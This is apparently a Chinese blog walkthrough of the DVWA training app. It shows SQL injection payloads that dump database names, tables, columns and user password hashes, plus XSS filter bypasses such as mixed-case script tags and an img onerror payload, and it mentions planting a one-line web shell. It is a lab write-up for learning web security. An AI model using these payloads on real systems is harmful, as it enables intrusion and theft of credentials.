dvwa 中 sql xss 漏洞

最新推荐文章于 2024-05-17 21:21:49 发布
最新推荐文章于 2024-05-17 21:21:49 发布
阅读量3.1k 收藏 4
点赞数 4
分类专栏: 基础漏洞 文章标签: sql xss 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62420492/article/details/122686461
版权

SQL Injection

medium

先观察页面,可以看到url中没有注入点,应该是post注入
在这里插入图片描述
使用burpsuite抓包,并将此报文send to repeater
在这里插入图片描述
第一次把id=1改为Id=1’
第二次改为id=1’’
send之后看response,从结果可见,这里输入是数值,不需要闭合,并且单引号应该是会被转义的

在这里插入图片描述
确定列数
id=1 order by 3 报错,列数为2列

爆库
id =1 union select 1,database
得到库名dvwa

爆表
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
得到表名guestbook和users

爆列
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=0x64767761
得到列名user_id,first_name,last_name,user,password,avatar,last_login,failed_login

得到数据库内容
id=1 union select group_concat(user),group_concat(password) from users

high

在这里插入图片描述
输入 1’
页面报错
在这里插入图片描述
输入1’’在这里插入图片描述
因此闭合是单引号,并且没有转义单引号
确定列数
在这里插入图片描述
爆库
在这里插入图片描述
爆表
在这里插入图片描述
爆列
在这里插入图片描述
得到数据库内容
在这里插入图片描述

写一句话木马
在这里插入图片描述

reflected xss

medium

在这里插入图片描述
查看源代码,发现对script有一个替换,但没有过滤大小写,只需script中改几个大写就可以了
在这里插入图片描述
xss中写入sCRipt>alert(/xss/)</sCRipt> <scr<script>ipt>alert(/xss/)</script>

high

在这里插入图片描述
查看源代码,发现对script有一个正则的替换
在xss中写入
在这里插入图片描述
在这里插入图片描述

stored xss

medium

在这里插入图片描述
查看源代码,name多了一个对于script的过滤,但没有过滤大小写和重写,所以可以借此绕过。
因为name 对长度有限制,所以直接修改原代码,将长度变大
然后在name 中输入
在这里插入图片描述
在这里插入图片描述

high

查看源代码,可以得知本关的name在之前的基础上多了一下一个正则去去除script,所以换个触发就可以
同样要将name 的长度修改一下
输入
在这里插入图片描述

Dom xss

medium

在这里插入图片描述
查看源代码,可以发现本关卡对script有一个过滤,另外看源代码可以发现需要把输入闭合掉,所以还应该写一个
在这里插入图片描述
在这里插入图片描述

</optin></select><img src = 1 onerror = alert(/xss/)>

High

在这里插入图片描述
发现是黑名单,注释掉即可

  (此处有一个空格)#<script>alert(/xss/)</script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

小杨想睡觉.
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过DVWA学习DOM型XSS
Mi1k7ea
01-02 4006
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类型,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触...
dvwa xss漏洞
qq_51177088的博客
05-24 206
@[TOC](xss) 原理 个人觉得,是和sql有很大相似之处的,都是利用嵌入恶意代码造成注入,一般使用JavaScript进行构造 分类 反射型 存储型 DOM型 注入及绕过 测试注入敏感字符被转义是否以及探测输出位置 是否需要闭合 内容若是在标签内则无需闭合,如果在标签属性则需要闭合标签后再输出 构造xss 在标签内: <script>alert(1);</script> 在属性内: "/><script>alert(1)</script>
【无标题】DVWA靶场之xss漏洞
weixin_46954909的博客
05-17 819
alert(1)
DVWA XSS漏洞
qq_49422880的博客
09-02 519
Reflected XSS Low medium high impossible Store XSS Low 这个场景就是模拟网络留言板的Xss注入,这里有两个对话框,我们都将我们的注入语句插入其寻找注入点,发现注入点在我们所提交的内容<script>alert("mohe xss")</script>上,毕竟是Low所以直接过。 medium 审计一下代码,发现也只是一个简单的匹配过滤而已,双写绕过即可。而且注入点是在name那里,所以我们...
DVWA系列Web常见漏洞XSS(DOM)源码分析及漏洞利用
weixin_57641619的博客
05-24 1696
本期主要讲解什么是基于DOM的XSS漏洞XSS(DOM)漏洞攻击实例,基于DOM的XSS漏洞产生的原因以及一般会在何处产生,最后讲解如何利用基于DOM的XSS漏洞(如XSS经典的窃取cookie等)。
DVWA靶场XSS反射性和存储型的漏洞测试(low~high)
weixin_51585429的博客
11-07 2054
DVWA靶场XSS反射型、存储型漏洞模块low~high等级
基于PythonFlaskWeb版网站sqlxss漏洞扫描框架 html + flask + python + mysql
最新发布
05-27
基于PythonFlaskWeb版网站sqlxss漏洞扫描 框架 html + flask + python + mysql + orm +dvwa+sqllabs+pikachu dvwa config\config.inc.php.bak to config.inc.php $_DVWA[ 'db_server' ] = getenv('DB_SERVER') ?:...
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞
PHP、Apache环境部署DVWA(综合靶场)
01-08
DVWA(Damn Vulnerable Web Application)是一款专门为安全研究人员和Web开发者设计的开源靶场工具,它包含了多种常见的Web应用漏洞,如密码爆破、SQL注入、文件上传、文件包含、跨站脚本(XSS)和跨站请求伪造...
linuxdvwa.doc
01-26
这个靶场包含了各种常见的Web应用安全漏洞,如SQL注入、XSS、CSRF等,非常适合学习和测试安全防御技术。通过实践,你可以提升对这些漏洞的理解和防护能力,同时加深对Linux服务器管理和Web应用配置的认识。
DVWA下的XSS漏洞通关练习
weixin_48609562的博客
06-15 628
XSS 介绍 XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器XSS可以分为存储型的XSS与反射型的XSS。 DOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。例如服务器端经常使用document.boby.innerHtml
DVWA靶机-反射性XSS漏洞(Reflected)
weixin_43726831的博客
10-24 3908
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) XSS跨站脚本攻击 XS...
【小猪学渗透】打靶第3天:DVWA入门:XSS漏洞、文件包含、CSRF
weixin_43521720的博客
03-20 825
随便输入点东西,发现了,可以输出。输入爆出xss漏洞爆出cookie。攻略上说查看源代码发现<script>标签被限制了,被替换了。(话说我没怎么学php语言这个源代码有点看不大懂,一会去补补)依旧爆出漏洞,说明成功了也可以通过大小写绕过这一部分的php代码算是看明白了,就是一个过滤的意思呗~那么我们使用别的标签也可以达到我们的目的。这个payload不成功,不知道哪里出的什么问题。
dvwaXSS漏洞通关
weixin_62420492的博客
12-24 1746
XSS漏洞(low级别)
DVWAXSS(跨站脚本漏洞)
TenG的博客
11-12 864
前言 本篇文章为DVWA平台XSS(跨站脚本漏洞)类型题目,本篇文章目的为记录自己的作题过程并且希望能够帮到大家,如有错误还请各位师傅指正! 本篇文章会同步至本人博客https://tenghy.gitee.io/teng/ 环境&工具: Windows10、phpstudy 正文 反射型XSS:反射型XSS又叫持久型XSS攻击,是攻击者发送一个带有恶意脚本的URL诱导他人点击,进一步触发脚本在浏览器上面运行。因为需要他人点击,所以链接都会具有诱惑性的名称。 存储型XSS:攻击者通过各种方式把恶意
DVWA靶场存储型XSS漏洞实验
weixin_44851588的博客
05-26 4490
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 来自菜鸟的一次简单分享,本次实验主要结合后台源代码讲解,梳理存储型XSS实验的思路,如果存在问题,请各位大佬多多指导。 一、XSS基础 1.什么是XSSXSS(Cross-site scripting)被称为跨站脚本攻击,由于与层叠样式表的缩写一样,因此被缩写为XSS。 2.XSS漏洞...
DVWA靶机-存储型XSS漏洞(Stored)
weixin_43726831的博客
11-25 4549
DVWA靶机-存储型XSS漏洞(Stored) 前章: DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) DVWA靶机-存储型X...
DVWA靶机-XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
天下著书立传者,皆为我师
03-16 1221
DVWA靶机--讲解XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
DVWA存储型XSS不同级别完美绕过
过客璇璇的博客
04-08 9529
DVWA存储型XSS不同级别完美绕过 Low级别 首先攻击者A访问这个网站 判断这个网站是否有XSS漏洞 发现是有XSS漏洞的 这时 攻击者A构造一个脚本 获取用户cookie 攻击者写好脚本以及测试这是否存在XSS <script>alert(1)</script> 以上看到当再次访问这个网站时是出来这...
dvwa靶场sql盲注入
06-03
包含了许多常见的 Web 攻击漏洞,例如 SQL 注入、XSS、CSRF 等,可以用来进行安全测试和学习。 对于 DVWASQL 注入攻击,可以使用盲注的方式进行。盲注是指攻击者通过不停地尝试不同的 SQL 语句,来判断...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值